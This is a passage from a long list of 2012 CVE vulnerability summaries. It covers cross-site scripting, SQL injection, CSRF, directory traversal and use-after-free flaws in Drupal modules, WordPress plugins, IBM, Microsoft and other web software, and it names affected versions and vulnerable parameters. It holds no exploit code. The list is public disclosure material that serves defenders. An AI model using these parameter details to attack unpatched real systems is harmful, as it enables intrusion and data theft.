unspecified vectors. [CVE-2012-5587] Cross-site scripting (XSS) vulnerability in the Email Field module 6.x-1.x before 6.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via the mailto link. [CVE-2012-5585] Cross-site scripting (XSS) vulnerability in the Mixpanel module 6.x-1.x before 6.x-1.1 in Drupal allows remote authenticated users with the "access administration pages" permission to inject arbitrary web script or HTML via the Maxpanel token. [CVE-2012-5569] Multiple cross-site scripting (XSS) vulnerabilities in the Basic webmail module 6.x-1.x before 6.x-1.2 for Drupal allow remote attackers to inject arbitrary web script or HTML via a (1) page title or (2) crafted email message. [CVE-2012-5559] Cross-site scripting (XSS) vulnerability in the page manager node view task in the Chaos tool suite (ctools) module 6.x-1.x before 6.x-1.10 for Drupal allows remote authenticated users with permissions to submit or edit nodes to inject arbitrary web script or HTML via the page title. [CVE-2012-5556] Multiple cross-site request forgery (CSRF) vulnerabilities in the RESTful Web Services (RESTWS) module 7.x-1.x before 7.x-1.1 and 7.x-2.x before 7.x-2.0-alpha3 for Drupal allow remote attackers to hijack the authentication of arbitrary users via unknown vectors. [CVE-2012-5554] The default configuration for the Webform CiviCRM Integration module 7.x-3.x before 7.x-3.2 has "Enforce Permissions" disabled, which allows remote attackers to obtain contact information by reading webforms. [CVE-2012-5553] Multiple cross-site scripting (XSS) vulnerabilities in the OM Maximenu module 6.x-1.x before 6.x-1.44 and 7.x-1.x before 7.x-1.44 for Drupal allow remote authenticated users with the "administer OM Maximenu" permission to inject arbitrary web script or HTML via the (1) Menu Title (2) Link Title, (3) Path Query, (4) Anchor, or (5) vocabulary names. [CVE-2012-5551] Multiple cross-site scripting (XSS) vulnerabilities in the MailChimp module 7.x-2.x before 7.x-2.7 for Drupal allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) a predictable "webhook URL key" and (2) improper sanitization of "Webhook variables from POST requests." [CVE-2012-5548] Cross-site scripting (XSS) vulnerability in the Time Spent module 6.x and 7.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5545] Multiple cross-site scripting (XSS) vulnerabilities in the ShareThis module 7.x-2.x before 7.x-2.5 for Drupal allow remote authenticated users with the "administer sharethis" permission to inject arbitrary web script or HTML via unspecified vectors related to "JavaScript settings." [CVE-2012-5541] Cross-site scripting (XSS) vulnerability in the Twitter Pull module 6.x-1.x before 6.x-1.3 and 7.x-1.x before 7.x-1.0-rc3 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "data coming from Twitter." [CVE-2012-5540] Multiple cross-site scripting (XSS) vulnerabilities in the Hostip module 6.x-2.x before 6.x-2.2 and 7.x-2.x before 7.x-2.2 for Drupal allow remote attackers with control of hostip.info to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5538] Cross-site scripting (XSS) vulnerability in the FileField Sources module 6.x-1.x before 6.x-1.6 and 7.x-1.x before 7.x-1.6 for Drupal, when the field has "Reference existing" source enabled, allows remote authenticated users to inject arbitrary web script or HTML via the filename of an uploaded file. [CVE-2012-5531] Multiple cross-site scripting (XSS) vulnerabilities in the GateIn Portal in JBoss Enterprise Portal Platform 5.2.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5478] The AuthorizationInterceptor in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 does not properly restrict access, which allows remote authenticated users to bypass intended role restrictions and perform arbitrary JMX operations via unspecified vectors. [CVE-2012-5460] Cross-site scripting (XSS) vulnerability in the help page in Juniper Secure Access (SA) with IVE OS before 7.1r13, 7.2.x before 7.2r7, and 7.3.x before 7.3r2 allows remote attackers to inject arbitrary web script or HTML via the WWHSearchWordsText parameter. [CVE-2012-5455] Cross-site scripting (XSS) vulnerability in the language search component in Joomla! before 3.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "typographical error." [CVE-2012-5452] Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS 2.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) multi_title parameter to blocks/add/ [CVE-2012-5416] Buffer overflow in Cisco Unified MeetingPlace Web Conferencing before 7.1MR1 Patch 1, 8.0 before 8.0MR1 Patch 1, and 8.5 before 8.5MR3 allows remote attackers to cause a denial of service (daemon hang) via unspecified parameters in a POST request, aka Bug ID CSCua66341. [CVE-2012-5388] Cross-site scripting (XSS) vulnerability in wlcms-plugin.php in the White Label CMS plugin 1.5 for WordPress allows remote authenticated administrators to inject arbitrary web script or HTML via the wlcms_o_developer_name parameter in a save action to wp-admin/admin.php, a related issue to CVE-2012-5387. [CVE-2012-5385] install/index.php in Craig Knudsen WebCalendar before 1.2.5 allows remote attackers to modify settings.php and possibly execute arbitrary code via vectors related to the user theme preference. [CVE-2012-5384] Multiple cross-site scripting (XSS) vulnerabilities in Craig Knudsen WebCalendar allow remote attackers to inject arbitrary web script or HTML via the (1) $name or (2) $description variables in edit_entry_handler.php, or (3) $url, (4) $tempfullname, or (5) $ext_users[] variables in view_entry.php, different vectors than CVE-2012-0846. [CVE-2012-5367] Multiple SQL injection vulnerabilities in OrangeHRM 2.7.1 RC 1 allow remote authenticated administrators to execute arbitrary SQL commands via the sortField parameter to (1) viewCustomers, (2) viewPayGrades, or (3) viewSystemUsers in symfony/web/index.php/admin/, as demonstrated using cross-site request forgery (CSRF) attacks. [CVE-2012-5354] Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey before 2.13 do not properly handle navigation away from a web page that has multiple menus of SELECT elements active, which allows remote attackers to conduct clickjacking attacks via vectors involving an XPI file, the window.open method, and the Geolocation API, a different vulnerability than CVE-2012-3984. [CVE-2012-5349] Multiple cross-site scripting (XSS) vulnerabilities in pay.php in the Pay With Tweet plugin before 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) link, (2) title, or (3) dl parameter. [CVE-2012-5348] SQL injection vulnerability in MangosWeb Enhanced 3.0.3 allows remote attackers to execute arbitrary SQL commands via the login parameter in a login action to index.php. [CVE-2012-5347] TinyWebGallery 1.8.3 allows remote attackers to execute arbitrary code via shell metacharacters in the command parameter to (1) inc/filefunctions.inc or (2) info.php. [CVE-2012-5346] Cross-site scripting (XSS) vulnerability in wp-live.php in the WP Live.php module 1.2.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. NOTE: some of these details are obtained from third party information. [CVE-2012-5344] Directory traversal vulnerability in the WebServer (Thttpd.bat) in IpTools (aka Tiny TCP/IP server) 0.1.4 allows remote attackers to read arbitrary files via a .. (dot dot) in a HTTP request. [CVE-2012-5343] Cross-site scripting (XSS) vulnerability in admin/login.php in Limny 3.0.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO, related to the "PHP_SELF" variable. [CVE-2012-5341] Multiple cross-site scripting (XSS) vulnerabilities in statistik.php in Otterware StatIt 4 allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter, (2) show parameter in a stat_tld action, or (3) order parameter in a stat_abfragen action. [CVE-2012-5339] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.3 allow remote authenticated users to inject arbitrary web script or HTML via a crafted name of (1) an event, (2) a procedure, or (3) a trigger. [CVE-2012-5337] Multiple cross-site scripting (XSS) vulnerabilities in jforum.page in JForum 2.1.9 allow remote attackers to inject arbitrary web script or HTML via the (1) action, (2) match_type, (3) sort_by, or (4) start parameters. [CVE-2012-5330] Multiple cross-site scripting (XSS) vulnerabilities in asaanCart 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to calc.php, (2) chat.php, (3) register.php, or (4) index.php in libs/smarty_ajax/ [CVE-2012-5325] Multiple cross-site scripting (XSS) vulnerabilities in the scr_do_redirect function in scr.php in the Shortcode Redirect plugin 1.0.01 and earlier for WordPress allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via the (1) url or (2) sec attributes in a redirect tag. [CVE-2012-5323] Cross-site request forgery (CSRF) vulnerability in webconfig/admin_passwd/passwd.html/admin_passwd in Xavi X7968 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via the sysUserName, sysPassword, and sysCfmPwd parameters. [CVE-2012-5322] Multiple cross-site scripting (XSS) vulnerabilities in Xavi X7968 allow remote attackers to inject arbitrary web script or HTML via the (1) pvcName parameter to webconfig/wan/confirm.html/confirm or (2) host_name_txtbox parameter to webconfig/lan/lan_config.html/local_lan_config. [CVE-2012-5321] tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection." [CVE-2012-5316] Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Spam & Virus Firewall 600 Firmware 4.0.1.009 and earlier allow remote authenticated users to inject arbitrary web script or HTML via (1) Troubleshooting in the Trace route Device module or (2) LDAP Username in the LDAP Configuration module. [CVE-2012-5315] Multiple cross-site scripting (XSS) vulnerabilities in php ireport 1.0 allow remote attackers to inject arbitrary web script or HTML via the message parameter to (1) messages_viewer.php, (2) home.php, or (3) history.php. [CVE-2012-5314] Cross-site scripting (XSS) vulnerability in ViewGit 0.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the f parameter. [CVE-2012-5307] Cross-site scripting (XSS) vulnerability in servlet/traveler in IBM Lotus Notes Traveler before 8.5.3.3 Interim Fix 1, when Firefox is used, allows remote attackers to inject arbitrary web script or HTML via the redirectURL parameter, a different vulnerability than CVE-2012-4824 and CVE-2012-4825. [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter. [CVE-2012-5298] Mavili Guestbook, as released in November 2007, stores guestbook.mdb under the web root with insufficient access control, which allows remote attackers to read the database via a direct request. [CVE-2012-5296] Multiple cross-site scripting (XSS) vulnerabilities in Mavili Guestbook, as released in November 2007, allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) approve.asp, (2) delete.asp, (3) edit.asp, or (4) edit2.asp. [CVE-2012-5295] Cross-site scripting (XSS) vulnerability in login.cfm in FuseTalk Forums 3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the windowed parameter. [CVE-2012-5290] Multiple SQL injection vulnerabilities in EasyWebRealEstate allow remote attackers to execute arbitrary SQL commands via the (1) lstid parameter to listings.php or (2) infoid parameter to index.php. [CVE-2012-5234] Open redirect vulnerability in index.php in ocPortal before 7.1.6 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter. [CVE-2012-5233] Cross-site scripting (XSS) vulnerability in the stickynote module before 7.x-1.1 for Drupal allows remote authenticated users with edit stickynotes privileges to inject arbitrary web script or HTML via unspecified vecotrs. [CVE-2012-5232] Cross-site scripting (XSS) vulnerability in the Quickl Form component for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5229] Cross-site scripting (XSS) vulnerability in css/gallery-css.php in the Slideshow Gallery2 plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the border parameter. [CVE-2012-5228] Cross-site scripting (XSS) vulnerability in admin/index.php in phplist 2.10.9, 2.10.17, and possibly other versions before 2.10.19 allows remote attackers to inject arbitrary web script or HTML via the testtarget parameter. NOTE: some of these details are obtained from third party information. [CVE-2012-5226] Multiple cross-site scripting (XSS) vulnerabilities in Peel SHOPPING 2.8 and 2.9 allow remote attackers to inject arbitrary web script or HTML via the (1) motclef parameter to achat/recherche.php or (2) PATH_INFO to index.php. [CVE-2012-5225] Cross-site scripting (XSS) vulnerability in webscr.php in xClick Cart 1.0.1 and 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the shopping_url parameter. [CVE-2012-5222] HP Service Manager Web Tier 9.31 before 9.31.2004 p2 allows remote attackers to obtain sensitive information via unspecified vectors. [CVE-2012-5219] Cross-site scripting (XSS) vulnerability in HP Managed Printing Administration (MPA) before 2.7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5200] Cross-site scripting (XSS) vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5186] Cross-site scripting (XSS) vulnerability in FLUGELz netmania myu-s and PHP WeblogSystem allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5184] Cross-site scripting (XSS) vulnerability in the Olive Toast Documents Pro File Viewer (formerly Files HD) app before 1.11.1 for iOS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5181] Cross-site scripting (XSS) vulnerability in concrete5 Japanese 5.5.1 through 5.5.2.1 and concrete5 English 5.5.0 through 5.6.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5180] The Opera Mobile application before 12.1 and Opera Mini application before 7.5 for Android do not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application. [CVE-2012-5179] The Boat Browser application before 4.2 and Boat Browser Mini application before 3.9 for Android do not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application. [CVE-2012-5177] Cross-site scripting (XSS) vulnerability in the Welcart plugin before 1.2.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5176] Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT 5.02 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to tag embedding. [CVE-2012-5175] Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to access-log data. [CVE-2012-5173] Session fixation vulnerability in BIGACE before 2.7.8 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2012-5170] Open redirect vulnerability in Pebble before 2.6.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-5169] Multiple cross-site scripting (XSS) vulnerabilities in file_manager/preview_top.php in ATutor AContent before 1.2-2 allow remote attackers to inject arbitrary web script or HTML via the (1) pathext, (2) popup, (3) framed, or (4) file parameter. [CVE-2012-5164] Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before 3.2.7 allow remote attackers to inject arbitrary web script or HTML via the term parameter to (1) autocomplete.php, (2) search/ajax/autosuggest.php, (3) livesuggest.php, or (4) save.php in frontend/modules/search/ajax. [CVE-2012-5163] Cross-site scripting (XSS) vulnerability in oc-admin/ajax/ajax.php in OSClass before 2.3.5 allows remote attackers to inject arbitrary web script or HTML via the id parameter in an enable_category action to index.php. [CVE-2012-5161] The XML Service interface in Citrix XenApp 6.5 and 6.5 Feature Pack 1 allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2012-5129] Heap-based buffer overflow in the WebGL subsystem in Google Chrome OS before 23.0.1271.94 allows remote attackers to cause a denial of service (GPU process crash) or possibly have unspecified other impact via unknown vectors. [CVE-2012-5127] Integer overflow in Google Chrome before 23.0.1271.64 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted WebP image. [CVE-2012-5112] Use-after-free vulnerability in the SVG implementation in WebKit, as used in Google Chrome before 22.0.1229.94, allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2012-5105] Multiple cross-site scripting (XSS) vulnerabilities in SQLiteManager 1.2.4 allow remote attackers to inject arbitrary web script or HTML via the dbsel parameter to (1) main.php or (2) index.php [CVE-2012-5104] Cross-site scripting (XSS) vulnerability in forums/ubbthreads.php in UBB.threads 7.5.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the Loginname parameter. [CVE-2012-5103] Multiple cross-site scripting (XSS) vulnerabilities in action/add-submit.php in Ggb Guestbook 0.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) url or (2) message parameter. [CVE-2012-5102] Cross-site scripting (XSS) vulnerability in inc/extensions.php in VertrigoServ 2.25 allows remote attackers to inject arbitrary web script or HTML via the ext parameter. [CVE-2012-5099] Cross-site scripting (XSS) vulnerability in list.php in PHPB2B 4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. [CVE-2012-5097] Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 10.1.4.3.0, 11.1.1.5.0, and 11.1.2.0.0 allows remote attackers to affect integrity, related to OAM Webgate. [CVE-2012-5065] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows local users to affect integrity via unknown vectors related to ImagePicker. [CVE-2012-5062] Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to affect integrity via unknown vectors related to User Interface Framework. [CVE-2012-5050] Cross-site scripting (XSS) vulnerability in the server in VMware vCenter Operations (aka vCOps) before 5.0.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5003] nxapplet.jar in No Machine NX Web Companion 3.x and earlier does not properly verify the authenticity of updates, which allows user-assisted remote attackers to execute arbitrary code via a crafted (1) SiteUrl or (2) RedirectUrl parameter that points to a Trojan Horse client.zip update file. [CVE-2012-4998] Cross-site scripting (XSS) vulnerability in index.php in starCMS allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2012-4995] Cross-site scripting (XSS) vulnerability in admin/userrighthandling.php in LimeSurvey before 1.91+ Build 120224 allows remote attackers to inject arbitrary web script or HTML via the full_name parameter in a moduser action to admin/admin.php. NOTE: some of these details are obtained from third party information. [CVE-2012-4989] Cross-site scripting (XSS) vulnerability in admin/plugin-index.php in OpenX 2.8.10 before revision 81823 allows remote attackers to inject arbitrary web script or HTML via the parent parameter in an info action. [CVE-2012-4983] Multiple cross-site scripting (XSS) vulnerabilities on the Forescout CounterACT NAC device before 7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the a parameter to assets/login or (2) the query parameter to assets/rangesearch. [CVE-2012-4982] Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the a parameter. [CVE-2012-4972] Multiple cross-site scripting (XSS) vulnerabilities in Layton Helpbox 4.4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) sys_solution_id, (2) sys_requesttype_id, (3) sys_problem_desc, (4) sys_solution_desc, (5) sys_problemsummary, (6) usr_Action_testing, (7) usr_Escalation, or (8) usr_Additional_Resources parameter to writesolutionuser.asp or the (9) sys_solution_id parameter to deletesolution.asp. [CVE-2012-4969] Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012. [CVE-2012-4968] Multiple cross-site scripting (XSS) vulnerabilities in SilverStripe 2.3.x before 2.3.13 and 2.4.x before 2.4.7 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted string to the AbsoluteLinks, (2) BigSummary, (3) ContextSummary, (4) EscapeXML, (5) FirstParagraph, (6) FirstSentence, (7) Initial, (8) LimitCharacters, (9) LimitSentences, (10) LimitWordCount, (11) LimitWordCountXML, (12) Lower, (13) LowerCase, (14) NoHTML, (15) Summary, (16) Upper, (17) UpperCase, or (18) URL method in a template, different vectors than CVE-2012-0976. [CVE-2012-4955] Cross-site scripting (XSS) vulnerability in Dell OpenManage Server Administrator (OMSA) before 6.5.0.1, 7.0 before 7.0.0.1, and 7.1 before 7.1.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4951] Multiple SQL injection vulnerabilities in terminal/paramedit.aspx in VeriFone VeriCentre Web Console before 2.2 build 36 allow remote attackers to execute arbitrary SQL commands via the (1) TerminalId, (2) ModelName, or (3) ApplicationName parameter. [CVE-2012-4942] Multiple cross-site scripting (XSS) vulnerabilities in Agile FleetCommander and FleetCommander Kiosk before 4.08 allow remote attackers to inject arbitrary web script or HTML via an arbitrary text field. [CVE-2012-4933] The rtrlet web application in the Web Console in Novell ZENworks Asset Management (ZAM) 7.5 uses a hard-coded username of Ivanhoe and a hard-coded password of Scott for the (1) GetFile_Password and (2) GetConfigInfo_Password operations, which allows remote attackers to obtain sensitive information via a crafted rtrlet/rtr request for the HandleMaintenanceCalls function. [CVE-2012-4932] Multiple cross-site scripting (XSS) vulnerabilities in SimpleInvoices before stable-2012-1-CIS3000 allow remote attackers to inject arbitrary web script or HTML via (1) the having parameter in a manage action to index.php [CVE-2012-4928] Cross-site scripting (XSS) vulnerability in ow_updates/index.php in Oxwall 1.1.1 allows remote attackers to inject arbitrary web script or HTML via the plugin parameter. [CVE-2012-4923] Multiple cross-site scripting (XSS) vulnerabilities in Endian Firewall 2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) createrule parameter to dnat.cgi, (2) addrule parameter to dansguardian.cgi, or (3) PATH_INFO to openvpn_users.cgi. [CVE-2012-4912] Cross-site scripting (XSS) vulnerability in the WebAccess component in Novell GroupWise 8.0 before Support Pack 3 and 2012 before Support Pack 1 allows remote attackers to inject arbitrary web script or HTML via a crafted signature in an HTML e-mail message. [CVE-2012-4907] Google Chrome before 18.0.1025308 on Android does not properly restrict access from JavaScript code to Android APIs, which allows remote attackers to have an unspecified impact via a crafted web page. [CVE-2012-4905] Cross-site scripting (XSS) vulnerability in Google Chrome before 18.0.1025308 on Android allows remote attackers to inject arbitrary web script or HTML via an extra in an Intent object, aka "Universal XSS (UXSS)." [CVE-2012-4904] Cross-application scripting vulnerability in Google Chrome before 18.0.1025308 on Android allows remote attackers to inject arbitrary web script via unspecified vectors, as demonstrated by "Universal XSS (UXSS)" attacks against the current tab. [CVE-2012-4893] Multiple cross-site request forgery (CSRF) vulnerabilities in file/show.cgi in Webmin 1.590 and earlier allow remote attackers to hijack the authentication of privileged users for requests that (1) read files or execute (2) tar, (3) zip, or (4) gzip commands, a different issue than CVE-2012-2982. [CVE-2012-4892] Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS 2012-03.08 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) title_en, (2) summary_en, or (3) body_en parameter in a submitnews action to the news module, a different vulnerability than CVE-2012-4890. NOTE: the provenance of this information is unknown [CVE-2012-4891] Cross-site scripting (XSS) vulnerability in fw/index2.do in ManageEngine Firewall Analyzer 7.2 allows remote attackers to inject arbitrary web script or HTML via the url parameter, a different vector than CVE-2012-4889. NOTE: the provenance of this information is unknown [CVE-2012-4890] Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS 2011 08.09.2 and earlier allow remote attackers to inject arbitrary web script or HTML via a (1) comment to the news, (2) title to the news, or (3) the folder names in a gallery. [CVE-2012-4889] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do [CVE-2012-4873] Cross-site scripting (XSS) vulnerability in the file_download function in GNUBoard before 4.34.21 allows remote attackers to inject arbitrary web script or HTML via the filename parameter. [CVE-2012-4872] Cross-site scripting (XSS) vulnerability in Tickets/Submit in Kayako Fusion before 4.40.985 allows remote attackers to inject arbitrary web script or HTML via certain vectors, possibly a crafted ticket description. [CVE-2012-4871] Cross-site scripting (XSS) vulnerability in service/graph_html.php in the administrator panel in LiteSpeed Web Server 4.1.11 allows remote attackers to inject arbitrary web script or HTML via the gtitle parameter. [CVE-2012-4870] Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) context parameter to panel/index_amp.php or (2) panel/dhtml/index.php [CVE-2012-4861] The web server in InfoSphere Data Replication Dashboard in IBM InfoSphere Replication Server 9.7 and 10.1 through 10.1.0.4 allows remote authenticated users to list directories via a direct request for a directory URL. [CVE-2012-4855] Unspecified vulnerability in the web services framework in IBM WebSphere Commerce 6.0 through 6.0.0.11 and 7.0 through 7.0.0.6 allows remote attackers to cause a denial of service (login outage) via unknown vectors. [CVE-2012-4853] Cross-site request forgery (CSRF) vulnerability in IBM WebSphere Application Server 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to hijack the authentication of arbitrary users for requests that trigger information disclosure. [CVE-2012-4851] Cross-site scripting (XSS) vulnerability in IBM WebSphere Application Server 8.5 Liberty Profile before 8.5.0.1 allows remote attackers to inject arbitrary web script or HTML via a crafted URI. [CVE-2012-4850] IBM WebSphere Application Server 8.5 Liberty Profile before 8.5.0.1, when JAX-RS is used, does not properly validate requests, which allows remote attackers to gain privileges via unspecified vectors. [CVE-2012-4848] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Foundations Start before 1.2.2c allow remote authenticated users to inject arbitrary web script or HTML via a Webconfig Users user-attribute field, as demonstrated by the (1) First Name or (2) Last Name field. [CVE-2012-4846] IBM Lotus Notes 8.5.x before 8.5.3 FP3 does not include the HTTPOnly flag in a Set-Cookie header for a web-application cookie, which makes it easier for remote attackers to obtain potentially sensitive information via script access to this cookie, aka SPRs JMAS7TRNLN and SRAO8U3Q68. [CVE-2012-4844] Cross-site scripting (XSS) vulnerability in the web server in IBM Lotus Domino 8.5.x through 8.5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4842] Open redirect vulnerability in the web server in IBM Lotus Domino 8.5.x through 8.5.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-4836] Cross-site scripting (XSS) vulnerability in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows remote authenticated users to inject arbitrary web script or HTML via a crafted string that is not properly handled during rendering of stored data. [CVE-2012-4835] Cross-site scripting (XSS) vulnerability in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4834] Directory traversal vulnerability in LayerLoader.jsp in the theme component in IBM WebSphere Portal 7.0.0.1 and 7.0.0.2 before CF19 and 8.0 before CF03 allows remote attackers to read arbitrary files via a crafted URI. [CVE-2012-4830] Unspecified vulnerability in IBM WebSphere Commerce 6.0 through 6.0.0.11 and 7.0 through 7.0.0.6 allows remote attackers to obtain users' personal data via unknown vectors. [CVE-2012-4825] Multiple cross-site scripting (XSS) vulnerabilities in servlet/traveler/ILNT.mobileconfig in IBM Lotus Notes Traveler before 8.5.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) userId or (2) address parameter in a getClientConfigFile action. [CVE-2012-4824] Open redirect vulnerability in servlet/traveler in IBM Lotus Notes Traveler 8.5.3 before 8.5.3.3 Interim Fix 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirectURL parameter. [CVE-2012-4819] Cross-site scripting (XSS) vulnerability in InfoSphere Business Glossary 8.1.1 and 8.1.2, InfoSphere DataStage Operation Console, InfoSphere Administration, and Reporting and Repository Management Web Console in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4792] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012. [CVE-2012-4787] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "Improper Ref Counting Use After Free Vulnerability." [CVE-2012-4782] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "CMarkup Use After Free Vulnerability." [CVE-2012-4781] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "InjectHTMLStream Use After Free Vulnerability." [CVE-2012-4776] The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not validate configuration data that is returned during acquisition of proxy settings, which allows remote attackers to execute arbitrary JavaScript code by providing crafted data during execution of (1) an XAML browser application (aka XBAP) or (2) a .NET Framework application, aka "Web Proxy Auto-Discovery Vulnerability." [CVE-2012-4775] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreeNode Use After Free Vulnerability." [CVE-2012-4771] Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) admin/accounts/, (2) admin/manage/, or (3) admin/manage/blocks/edit/ [CVE-2012-4751] Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) Help Desk 2.4.x before 2.4.15, 3.0.x before 3.0.17, and 3.1.x before 3.1.11 allows remote attackers to inject arbitrary web script or HTML via an e-mail message body with whitespace before a javascript: URL in the SRC attribute of an element, as demonstrated by an IFRAME element. [CVE-2012-4747] Bugzilla 2.x and 3.x through 3.6.11, 3.7.x and 4.0.x before 4.0.8, 4.1.x and 4.2.x before 4.2.3, and 4.3.x before 4.3.3 stores potentially sensitive information under the web root with insufficient access control, which allows remote attackers to read (1) template (aka .tmpl) files, (2) other custom extension files under extensions/, or (3) custom documentation files under docs/ via a direct request. [CVE-2012-4745] Cross-site scripting (XSS) vulnerability in admin/login.asp in Acuity CMS 2.6.2 allows remote 